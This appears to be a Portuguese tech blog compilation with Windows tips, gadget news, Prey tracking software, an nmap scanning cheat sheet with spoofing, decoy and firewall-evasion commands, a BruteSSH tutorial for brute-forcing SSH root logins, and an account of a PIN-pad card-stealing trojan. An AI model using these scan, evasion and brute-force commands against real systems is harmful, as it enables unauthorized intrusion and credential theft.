Recuperando o atalho para “Mostrar a área de trabalho”

Você perdeu o botão de atalho para mostrar a área de trabalho?

Vixi… Deve ser complicado, né?

Seus problemas acabaram! Testei no Windows XP, creio que funcione nas outras versões também…

Abra um editor de textos puro (tal como o Mep Texto ou o bloco de notas) e digite o texto destacado:

[Shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop

Salve na área de trabalho com um nome qualquer, como por exemplo, “Mostrar área de trabalho”; coloque a extensão “.scf” (de comando do Windows Explorer) e escolha �Salvar como o tipo todos os arquivos”, para que o editor não coloque a extensão �.txt�. Estando ali, copie-o para a barra de tarefas! Mais precisamente a barra de ferramentas “Quick launch”, que mostra os �iconezinhos� na barra de tarefas. Se ela não estiver aparecendo, clique com o botão direito do mouse na barra de tarefas e escolha “Barras de ferramentas > Inicialização rápida”, ou “Iniciar rapidamente” ou ainda “Quick launch”, se seu sistema for em inglês. Então arraste o ícone para essa barra e pronto!

Descobri isso ao clicar com o botão direito do mouse nesse ícone e escolher �Enviar para > Mep Texto� (meu editor). Existe um arquivo com o nome “Mostrar área de trabalho” numa pasta do Windows, pode-se criar um atalho para ele também.

Dica: teclando a tecla do logotipo do Windows junto com a letra “D”, tem o mesmo efeito de clicar no comando de mostrar a área de trabalho, mesmo se ele não estiver visível. A tecla do logotipo do Windows normalmente fica entre as teclas ALT e CTRL. Segure-a, e dê um toque na letra D. Depois solte e a área de trabalho será exibida.</

 

Edição limitada em comemoração ao 35º aniversário do Star Wars

Para comemorar o 35º aniversário de Star Wars a edição limitada, apenas 35 unidades numeradas, do C-3PO e R2D2, feitas de ouro maciço, envolto em uma redoma de vidro, foram vendidas por por cerca de USD$6.000,cada.

500 moedas comemorativas de prata, pesando 1kg, com 14 mm de espessura e 100mm de diâmetro com design incluindo a Estrela da Morte, light-sabers e a logotipo  estão disponíveis por USD$2.960, cada.

Fonte:GeekChic

Conheça programa para rastrear computador perdido ou roubado

Os computadores portáteis tornaram-se ferramentas poderosas para quem precisa contar com um equipamento que possa ser levado a qualquer lugar. Porém, ninguém está livre de perder o equipamento, seja em situação de roubo, extravio ou esquecimento. Recentemente a polícia recuperou um laptop graças a programa que envia localização.

Dependendo da importância dos arquivos contidos nele, o prejuízo maior não é nem o valor da máquina, mas as informações armazenadas. Para prevenir, valem os cuidados de sempre, mas que tal contar com um aplicativo gratuito que disponibiliza a localização do computador num serviço na internet?
Nesta coluna, irei apresentar o Prey Project, um aplicativo de código aberto que permite rastrear o computador em caso de perda. O programa pode ser instalado no Windows, Linux, Mac e Android. A localização do equipamento fica disponível num serviço na internet, em que o usuário deve estar cadastrado previamente. A modalidade gratuita permite que sejam adicionados até três equipamentos para o monitoramento. Caso seja necessário adicionar mais computadores, é possível contar com a modalidade paga.
O instalador do Prey Project pode ser baixado no site do fabricante. Escolha a opção de download correspondente ao sistema operacional no computador a ser rastreado. Durante o processo de instalação, é necessário criar um usuário para acessar o painel de monitoramento no site. Esse usuário poderá ser adicionado em outras duas instalações de computadores, que também poderão ser rastreados. Para usuários do sistema operacional Windows, pode ser necessário autorizar a execução do aplicativo nos programas de segurança. Ao término da instalação, o agente de rastreamento ficará ativo e irá se reportar a cada 10 minutos ao painel de monitoramento. O tempo de envio da posição pode ser personalizado para cada equipamento.
Para acessar as configurações de usuário e verificar a situação dos computadores que estão sendo rastreados, basta acessar o site e autenticar no sistema. Já na página inicial ficam visíveis as máquinas monitoradas. Para definir configurações avançadas ou notificar a perda, é preciso clicar sobre a imagem corresponde ao dispositivo.
Dispositivos monitorados pelo Prey Project (Foto: Reprodução)
O sistema só irá gerar relatórios de rastreamento quando o usuário alterar o status do dispositivo para “missing”. Nessa mesma tela é possível definir a periodicidade de coleta de dados.
Tela responsável pelas configurações do sistema, assim como o acionamento da rastreamento quando o notebook for perdido (Foto: Reprodução)

Nos notebooks que possuírem webcam, durante o processo de coleta, o programa faz fotografias, a fim de registrar o rosto do usuário que está acessando o equipamento indevidamente. Além disso, o software registra informações sobre as configurações da rede, programas em uso e arquivos alterados.

Após sinalizar o notebook perdido, o sistema irá exibir em vermelho a ilustração do dispositivo (Foto: Reprodução)
Após definido como perdido, o programa irá enviar para página de monitoramento o relatório contendo as informações que foram configuradas. Nele também será enviada a localização usando serviço o Google Maps. A precisão do rastreamento impressiona. O relatório também é enviado para a conta de e-mail cadastrada pelo usuário.

Localização do notebook perdido (Foto: Reprodução)
Vale salientar que, para o Prey Project funcionar, o equipamento perdido não pode ter sido formatado e a sua localização só será possível quando ele estiver conectado à internet. Uma dica para desestimular a formatação num primeiro momento é deixar ativo um usuário visitante, sem senha, no sistema operacional. Afinal, é muito provável que quem estiver com o equipamento irá tentar usá-lo e, se estiver acessível, talvez a formatação nem ocorra.

Dicas do Nmap

Aqui vão alguns comando basicos do nmap,depois posto alguns mais complexos, uma dica:
* se vc quiser salvar o resultado em um arquivo basta redirecionar a saida, no final de cada linha de comando colocar >nome.txt se o arquivo existir será sobrescrito se nao existir sera criado.

Ping Sweeping
nmap -sP 192.168.0.1-254

O nmap envia ICMP Echo Request e TCP ACK para os hosts que estão sendo scaneado (1 – 254). O host que responder será considerado pelo nmap como ativo.

nmap –sP –PT80 192.168.0.24/24

As vezes ping (ICMP) são bloqueados pelos roteadores/firewall, então para evitar isso pode–se usar a opção de enviar somente um ACK. O host que responder será considerado pelo nmap
como ativo.

TCP Scan
nmap –sT 192.168.0.24

Faz uma scan (varredura) a procura de portas TCP abertas. Esse método é facilmente detectado pela vitima.

UDP Scanning
nmap –sU 192.168.0.1

Esse método é bastante usado para procurar brechas em portas abertas UDP tais como rpcinfo e Back Orifice. Um fator negativo dessa opção é a morosidade para obter as informações devido a maioria das maquinas Unix limitar o faixa de erros ICMP. Portanto, ao detectar esse faixa limite o próprio nmap diminui o envio de pacotes para não causar um overflow na vitima.

Stealth Scanning
nmap –sS –O target.com

scaneia (varredura) por portas abertas com opção (-O) OS fingerprinting.

nmap –sS –p 21-25,80,135-139,443 192.168.0.24

Scaneia (varredura) portas especificadas com a opção -p. O nmap apresenta um resultado rápido quando se determina as portas desejadas para o scan.
* Esses são métodos usado de TCP SYN e proporciona um nível menor de detecção devido ao 3 way handshake nunca se finaliza por completo. O método consiste no envio de pacote SYN o qual representa o primeiro passo do processo de 3 way handshake. As porta que estiverem abertas responderão com um pacote de SYN|ACK Porem,o atacante retorna um pacote de RST ao invés de ACK, o qual termina a conexão. Com isso o nmap consegue determinar as portas que estão ouvindo.

OS Fingerprinting
nmap –sS –O target.com

Esse opção (-O) de fingerprinting é bastante útil para aqueles que estão familiarizados com um especifico sistema e seus bugs. Executando o nmap com essa opção de fingerprinting, o mesmo tenta descobrir o Sistemas Operacional do servidor da vitima que esta rodando. De posse do nome e versão do S.O. da vitima, fica mais fácil para o atacante procurar por bugs e outras ferramentas para completar o attack.

Ident Scanning
nmap -sT -p 80 -I -O target.com

O atacante pode procurar por um especifico processo; por exemplo, um servidor de web rodando
com privilegio root.Se a vitima estiver rodando identd, o atacante usando o nmap será capaz de descobrir o dono do http daemon com a opção “-I”.

Outras Opções
nmap -p 25,53 -sX -P0 -D 1.2.3.4,5.6.7.8 192.168.0.100
# 1.2.3.4 5.6.7.8 forjando um falso source IP

nmap –v target.com
# scaneia todas portas reservadas de TCP *** -v = verbose on

nmap –v –randomize_hosts –p 80 ‘*.*.2.3-5’
# scaneia (varredura) randomicamente por específica faixa de IP

nmap –F target.com/24
# executa tcp scan (varredura)

nmap –P0 ‘192.168.[12-30].*’
# procura por hosts ativos das classes adjacentes

nmap –P0 192.168.0-50.0-255
# mesma opção usada no item anterior porem sem usar apostrofes

O alcance de um Scan pode ser desde a porta 0 até a porta 65535, podendo limitar o Scan da forma que lhe for conveniente, como por exemplo escaneando somente portas altas em busca de serviços “escondidos”.

Informações sobre determinada porta: nmap -sV -p *Porta* *IP Alvo*

Burlando Firewalls: nmap -sS -P0 -p *Porta(s)* *IP Alvo*

Muitos Firewalls atuais descartam todos os pacotes recebidos, fazendo com que o Scan se torne extremamente lento, a fim de tentar burlar essa proteção podemos utilizar o comando -P0, porém o Scan usando este método demora muito mais do que o normal, já que, por não receber respostas, ele precisa aguardar um tempo muito maior antes de passar para a porta seguinte. Mas cuidado, apesar de não responder, o computador remoto pode ser configurado para logar suas tentativas, permitindo que o administrador tome conhecimento e aja de acordo com a situação.

Fragmentando pacotes: nmap -sS -f -p *Porta(s)* *IP Alvo*

A opção -f faz com que o Scan solicitado (incluindo Scans usando Ping) utilize pequenos pacotes IP fragmentados. A idéia é dividir o cabeçalho TCP em diversos pacotes para tornar mais difícil para os filtros de pacotes, os sistemas de detecção de intrusão, e outros aborrecimentos, detectar o que você está fazendo. Tenha cuidado com isto! Alguns programas tem problemas para lidar com estes pequenos pacotes.

Disfarçando IP de origem: nmap -PN -sS -S <Endereço_IP> -p *Porta(s)* *IP Alvo*

Em algumas circunstâncias, o Nmap pode não conseguir determinar o seu endereço de origem (o Nmap irá dizer se for esse o caso). Nesta situação, use o -S com o endereço IP da interface que você deseja utilizar para enviar os pacotes. Outro uso possível para esta flag é para disfarçar o Scan e fazer com que os alvos achem que alguma outra pessoa está escaneando-as. Imagine uma empresa que está constantemente sofrendo Scan de portas de um concorrente! A opção -e normalmente seria requerida para este tipo de uso e -P0 seria recomendável.

Ataque SSH por Bruteforce com BruteSSH

Ssh_console

Introdução
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)

Instalando o BruteSSH
Abra o terminal e faça o download do arquivo pelo comandos a seguir:

 

Agora vamos decompactar o arquivo:

1
root@bt:~# tar -jxvf brutessh-0.5.tar.bz2

Depois basta entrar no diretório

1
2
root@bt:~# cd brutessh
root@bt:~/brutessh#

Agora é só rodar o script feito em python (py):

1
root@bt:~/brutessh# python brutessh.py

Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.

1
2
3
-h: Host destino
-u: Usuário
-d: Arquivo de senha

Ps: Criei um script capaz de instalar o BruteSSH automaticamente.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/bash
# Por Jarlley Ribeiro - 0fx66
clear
echo "  [        Brute install                  ]"
echo "  [       0fx66 - www.0fx66.blogspot.com  ]"
echo ""
echo " [*]  Downloadind BruteSSH. Please Wait..."
wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 1&gt; /dev/null 2&gt; /dev/stdout
echo " [*]  Unpacking Brutessh. Please Wait..."
tar -jxvf brutessh-0.5.tar.bz2 1&gt; /dev/null 2&gt; /dev/stdout
echo " [*]  OK!"
echo " [*]  To run, use: python brutessh.py"
echo "  Exiting.."

Agora basta você da as permissões necessárias (x = execução) para executar o script.

1
root@bt:~/aaa# chmod +x brutessh_Install.sh

Ataque!
Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criar uma pequena world list com a senha correspondente.

Agora vamos disparar o ataque usando a seguinte sintaxe:

1
root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password

Onde os parâmetros foram explicados acima. O resultado foi:

No campo “Password Found”, ele exibe a senha quebrada (toor).

Finalizando
Com uma ótima word list e paciência, você pode rapidamente conseguir acesso ao sistema por ssh, para se proteger, evite usar senhas de fáceis caracteres (toor, 123, 321) e mude sua senha regulamente.

Fonte:INW

O vírus chupa cabra – ataques contra dispositivos de pagamento

Você provavelmente já ouviu falar sobre o ‘Chupa Cabra’, uma criatura mítica que supostamente habita alguns países da América Central. Em tempos recentes chegou-se a anunciar que a tal criatura foi capturada em Porto Rico. Essa história é bastante popular em partes do México e nos Estados Unidos, especialmente entre as comunidades latino-americanas. O nome “chupa cabra” também foi adotado pelos carders brasileiros (criminosos especializados em clonar cartões de crédito) para designar equipamentos instalados em caixas eletrônicos. Eles usam esse nome porque o “chupa cabra” instalado nesses caixas irá “chupar” as informações do cartão de crédito da vítima.

É muito comum encontrar matérias na imprensa mostrando criminosos sendo presos por instalarem dispositivos “chupa cabras” em caixas eletrônicos de bancos. Alguns desses criminosos são incompetentes ou sem sorte e muitas vezes são pegos pelas câmeras de segurança, ou até mesmo pela polícia, como os que aparecem no vídeo abaixo:

De fato instalar um chupa cabra em um caixa eletrônico é um negócio arriscado para esses criminosos. E é exatamente por isso que os carders brasileiros juntaram forças com os criadores de códigos maliciosos no país para desenvolver um jeito mais fácil e seguro de roubar informações e clonar cartões de créditos. Dessa cooperação nasceu o “vírus chupa cabra”.

A idéia do vírus é simples: ao invés de se arriscarem instalando um chupa cabra em caixas eletrônicos, os criminosos desenvolveram uma maneira de instalar códigos maliciosos em computadores usando Windows. Esses códigos maliciosos tem a função de interceptar a comunicação de PIN Pads – dispositivos do tipo usamos para pagar contas em supermercados, postos de gasolina, lugares onde se aceita cartões de crédito e débito.

O vírus chupa cabra foi primeiramente detectado no Brasil em Dezembro de 2010, sendo detectado como Trojan-Spy.Win32.SPSniffer e possui 4 variantes (A, B, C e D). Geralmente esse vírus é altamente especializado e distribuído para alvos pré-estabelecidos. Infelizmente esse tipo de ataque está em franco crescimento – já sabemos de casos confirmados nos Estados Unidos usando a mesma técnica, e provavelmente há casos similares em outros lugares do mundo.

Claro que os PIN Pads são protegidos pelos fabricantes. Esses equipamentos possuem recursos de hardware e software para assegurar que as chaves de segurança sejam apagadas caso alguém tente abrir ou adulterar o dispositivo. De fato, o PIN (a senha) é criptografado imediatamente ao ser digitado no teclado do dispositivo, usando uma variedade de esquemas criptográficos e chaves simétricas. Geralmente os dispositivos usam um encoder triple DES, tornando muito difícil descobrir qual foi o PIN inserido no dispositivo, no ato da operação.

Mas havia um problema: estes dispositivos sempre são conectados a um computador através de porta USB ou serial, que se comunica com um software de TEF (Transferência eletrônica de fundos). PIN Pads antigos e desatualizados, ainda utilizados no Brasil nessa data eram vulneráveis a uma falha de design: eles não costumavam criptografar alguns dados do seu cartão, como o “Track 1”, enviando-os em modo “texto plano” para o computador.

Os dados “Track 1” de um cartão de crédito e os dados públicos do CHIP não eram criptografados no hardware desses PIN Pads. Esses dados geralmente são o número de cartão de crédito, a data de expiração, o service code e o CVV (Card Verification Value), resumidamente, capturando esses dados eram suficientes para que um criminoso pudesse clonar seu cartão e começar a gastar seu dinheiro.

O malware instalava um simples driver sniffer na porta serial ou USB, geralmente adaptados de softwares comerciais legítimos como o Eltima e o TVicPort, “chupando” toda a informação que trafegava entre o PIN Pad e o computador. As primeiras versões do vírus “chupa cabra” também instalava um controle Active X e uma DLL maliciosa para roubar todas as informações transmitidas em todas as portas seriais do computador, não importam qual dispositivo estivesse conectado nelas.

As novas versões do “virus chupa cabra” usavam o driver do TVicCommSpy (software legítimo, usado por desenvolvedores) com o mesmo objetivo: capturar os dados transmitidos via porta USB:

Adicionalmente a DLL maliciosa também gravava todas as informações digitadas no teclado, atuando como um keylogger. Todos os dados capturados da Track 1 dos cartões de crédito e as informações dos computadores infectados eram gravadas em um arquivo e enviadas para o criminoso, geralmente através de e-mail.

Para se assegurar de que as informações roubadas seriam enviadas em um modo “seguro”, o vírus usava um sistema simétrico de criptografia, com um nome de chave Unicode muito interessante: Robin Hood.

Uma vez que o problema foi detectado, as companhias de cartão de crédito no Brasil passaram a instalar atualizações de firmware nos PIN Pads vulneráveis. Essa atualização corrigiu o problema por completo.

Essa é a história real do Trojan-Spy.Win32.SPSniffer, o vírus chupa cabra, que foi desenvolvido numa parceria entre os carders e criadores de vírus brasileiros. Mas uma parceria entre a Kaspersky Lab e uma companhia líder no segmento de cartões de crédito no Brasil proveu detecção e remoção do código malicioso.

Fonte:Kaspersky

Campainha Wireless

O nome dela é MP3 DJ, uma campainha Wireless que pode ser programada com qualquer som ou música que escolher – até mesmo MP3 – e o mais importante, pode ser carregada com você onde estiver a uma distância de até 100 metros. Assim dá pra fazer um churrasco no fundo da sua casa e carregar a campainha com você, pra ter certeza que escutará quando chegar alguém na sua casa. Veja um vídeo a seguir (em inglês) com uma demonstração dela.

Link do Video

Tenho quase certeza que o rapaz do vídeo bebeu todas antes de gravar. Voltando a falar da MP3 DJ, ela é dividida em duas partes, o botão que fica na porta e a campainha em si, que pode ser carregada junto com você. O botão utiliza 1 pilha AA para funcionar e a campainha 3 pilhas AA.

A campainha vem com um slot para cartões SD de até 32 GB para gravar as músicas, além de um software para poder definir qual parte de cada música será reproduzida nela. 32 GB da pra colocar bastante música não?!

Na campainha existem botões que permitem que você troque de música, aumente o volume etc, sem precisar ter um PC por perto para fazer isso. O preço? US$ 49.99 no site da própria fabricante Swann.

Fonte:RockTech

Bloqueando autoridade certificadora por país

Quando trabalhamos com o nosso sistema operacional , acessamos a vários sites, muitos dos quais temos acesso via HTTPS, eu me lembro quando no suporte o cara liga pra você e fala:

“Se aparecer o cadeado, então você está seguro”

A questão da CA é uma piada, especialmente porque, por padrão aceitamos várias entitades como de confiança.

Numa conversa do pessoal do Flu Project , eles verificam as seguintes problematicas:

Problemas relacionados com o gerenciamento de certificados SSL (não verificabilidade , falsa sensação de segurança, falhas no processo de registro)
Problemas com certificados de PKCS # 12
Problemas com comunicações seguras e cifradas (ataques avançados MITM)
Vetores práticos de ataque sobre SmartCards (DNI-e)

Por isso apresento a vocês uma ferramenta SSLcop que se encarrega de bloquear as CA por procedencia.

Veja a ferramenta:

A ferramenta fornece um método muito fácil de bloquear as CA por origem geográfica.

Por exemplo, nós marcamos todos, menos a Espanha, e bloquear.

Desta forma, pode facilmente bloquear todo o CA, que fácil.

A ferramenta pode ser baixada AQUI

Fonte:FluProject